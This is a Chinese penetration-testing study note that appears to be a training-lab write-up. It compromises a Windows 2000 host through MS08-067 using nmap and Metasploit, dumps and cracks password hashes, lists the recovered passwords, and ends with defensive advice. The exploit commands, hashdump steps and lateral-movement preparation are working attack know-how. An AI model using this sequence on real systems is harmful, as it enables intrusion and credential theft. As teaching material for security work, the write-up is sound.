渗透测试学习笔记之案例二
字数 1824 2025-08-29 08:31:41

渗透测试案例二:Windows 2000服务器渗透实战

0x00 实验环境

  • 目标靶机: 10.11.1.227 (Windows 2000)
  • 攻击机: Kali Linux (10.11.0.38)

0x01 信息收集阶段

1.1 初始扫描

使用nmap进行端口和服务扫描:

nmap -sV -O -Pn 10.11.1.227

扫描结果分析

  • 开放端口及服务:

    • 135/tcp: msrpc (Microsoft Windows RPC)
    • 139/tcp: netbios-ssn
    • 445/tcp: microsoft-ds (Windows 2000)
    • 1025-1026/tcp: msrpc
    • 3372/tcp: msdtc (Microsoft Distributed Transaction Coordinator)
    • 5800/tcp: vnc-http (RealVNC 4.0)
    • 5900/tcp: vnc
  • 操作系统识别:Windows 2000

1.2 漏洞验证

针对SMB服务进行MS08-067漏洞验证:

nmap --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse -sT -Pn 10.11.1.227

验证结果

  • 确认存在MS08-067漏洞 (CVE-2008-4250)
  • 影响系统:Windows 2000 SP4

0x02 漏洞利用阶段

2.1 使用Metasploit进行攻击

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.11.1.227
msf exploit(ms08_067_netapi) > exploit

攻击结果

  • 成功获取Meterpreter会话
  • 当前权限:NT AUTHORITY\SYSTEM (最高权限)

0x03 后渗透阶段

3.1 系统信息收集

获取系统信息

meterpreter > sysinfo
  • 操作系统:Windows 2000 (Build 2195)
  • 架构:x86
  • 语言:en_US
  • 域:WORKGROUP

获取进程列表

meterpreter > ps
  • 关键进程:winvnc4.exe (RealVNC服务)

3.2 用户信息收集

获取本地用户

meterpreter > shell
C:\WINNT\system32> net users
  • 用户列表:admin, Administrator, backup, david, gary等

获取管理员组用户

C:\WINNT\system32> net localgroup administrators
  • 管理员组成员:Administrator, backup

获取域信息

C:\WINNT\system32> net view /domain
  • 域列表:MYGROUPTHINC, WORKGROUP

3.3 密码哈希获取与破解

获取密码哈希

meterpreter > hashdump
  • 获取所有用户的LM/NTLM哈希

哈希破解结果

用户名 密码
backup backup
Administrator 7A6417Yrjh
admin CHANGEME
david 012345
gary REDGREENBLUE
john password1

在线破解工具

  • http://www.objectif-securite.ch/en/ophcrack.php (LM Hash破解)

0x04 持续渗透准备

4.1 网络拓扑发现

查看网络配置

C:\WINNT\system32> ipconfig -all
  • IP地址:10.11.1.227
  • 网关:10.11.1.220
  • DNS:10.11.1.220, 10.11.1.221

发现网络共享

C:\WINNT\system32> net view
  • 网络主机:BETHANY, BOB2, CORY等

4.2 密码重用分析

  • 整理获取的明文密码表
  • 为后续横向移动准备凭证

0x05 技术要点总结

  1. 信息收集

    • 全面扫描目标开放端口和服务
    • 识别操作系统版本和关键服务
  2. 漏洞利用

    • 针对老旧系统(如Windows 2000)优先考虑已知漏洞
    • 使用nmap脚本验证漏洞存在性
    • Metasploit提供成熟的漏洞利用模块
  3. 权限提升

    • 初始获取的SYSTEM权限无需提权
    • 了解常见提权技术(Named Pipe Impersonation等)
  4. 后渗透技术

    • 系统信息收集(systeminfo, ipconfig等)
    • 用户和组信息枚举
    • 密码哈希获取与破解
    • 网络拓扑发现
  5. 持续渗透准备

    • 密码重用分析
    • 凭证整理与保存
    • 网络共享发现

0x06 防御建议

  1. 针对MS08-067漏洞

    • 及时安装安全补丁(已停止支持的Windows 2000应考虑升级)
    • 禁用不必要的SMB服务
  2. 密码安全

    • 使用复杂密码(避免简单密码如"password1")
    • 禁用LM Hash存储(Windows 2000默认启用)
    • 定期更换密码
  3. 系统加固

    • 限制管理员组用户数量
    • 禁用不必要的服务(如VNC)
    • 启用日志审计
  4. 网络隔离

    • 老旧系统应置于隔离网络
    • 限制网络共享访问权限
  5. 监控措施

    • 监控异常登录行为
    • 检测哈希传递攻击
渗透测试案例二:Windows 2000服务器渗透实战 0x00 实验环境 目标靶机 : 10.11.1.227 (Windows 2000) 攻击机 : Kali Linux (10.11.0.38) 0x01 信息收集阶段 1.1 初始扫描 使用nmap进行端口和服务扫描: 扫描结果分析 : 开放端口及服务: 135/tcp: msrpc (Microsoft Windows RPC) 139/tcp: netbios-ssn 445/tcp: microsoft-ds (Windows 2000) 1025-1026/tcp: msrpc 3372/tcp: msdtc (Microsoft Distributed Transaction Coordinator) 5800/tcp: vnc-http (RealVNC 4.0) 5900/tcp: vnc 操作系统识别:Windows 2000 1.2 漏洞验证 针对SMB服务进行MS08-067漏洞验证: 验证结果 : 确认存在MS08-067漏洞 (CVE-2008-4250) 影响系统:Windows 2000 SP4 0x02 漏洞利用阶段 2.1 使用Metasploit进行攻击 攻击结果 : 成功获取Meterpreter会话 当前权限:NT AUTHORITY\SYSTEM (最高权限) 0x03 后渗透阶段 3.1 系统信息收集 获取系统信息 : 操作系统:Windows 2000 (Build 2195) 架构:x86 语言:en_ US 域:WORKGROUP 获取进程列表 : 关键进程:winvnc4.exe (RealVNC服务) 3.2 用户信息收集 获取本地用户 : 用户列表:admin, Administrator, backup, david, gary等 获取管理员组用户 : 管理员组成员:Administrator, backup 获取域信息 : 域列表:MYGROUPTHINC, WORKGROUP 3.3 密码哈希获取与破解 获取密码哈希 : 获取所有用户的LM/NTLM哈希 哈希破解结果 : | 用户名 | 密码 | |--------|------| | backup | backup | | Administrator | 7A6417Yrjh | | admin | CHANGEME | | david | 012345 | | gary | REDGREENBLUE | | john | password1 | 在线破解工具 : http://www.objectif-securite.ch/en/ophcrack.php (LM Hash破解) 0x04 持续渗透准备 4.1 网络拓扑发现 查看网络配置 : IP地址:10.11.1.227 网关:10.11.1.220 DNS:10.11.1.220, 10.11.1.221 发现网络共享 : 网络主机:BETHANY, BOB2, CORY等 4.2 密码重用分析 整理获取的明文密码表 为后续横向移动准备凭证 0x05 技术要点总结 信息收集 : 全面扫描目标开放端口和服务 识别操作系统版本和关键服务 漏洞利用 : 针对老旧系统(如Windows 2000)优先考虑已知漏洞 使用nmap脚本验证漏洞存在性 Metasploit提供成熟的漏洞利用模块 权限提升 : 初始获取的SYSTEM权限无需提权 了解常见提权技术(Named Pipe Impersonation等) 后渗透技术 : 系统信息收集(systeminfo, ipconfig等) 用户和组信息枚举 密码哈希获取与破解 网络拓扑发现 持续渗透准备 : 密码重用分析 凭证整理与保存 网络共享发现 0x06 防御建议 针对MS08-067漏洞 : 及时安装安全补丁(已停止支持的Windows 2000应考虑升级) 禁用不必要的SMB服务 密码安全 : 使用复杂密码(避免简单密码如"password1") 禁用LM Hash存储(Windows 2000默认启用) 定期更换密码 系统加固 : 限制管理员组用户数量 禁用不必要的服务(如VNC) 启用日志审计 网络隔离 : 老旧系统应置于隔离网络 限制网络共享访问权限 监控措施 : 监控异常登录行为 检测哈希传递攻击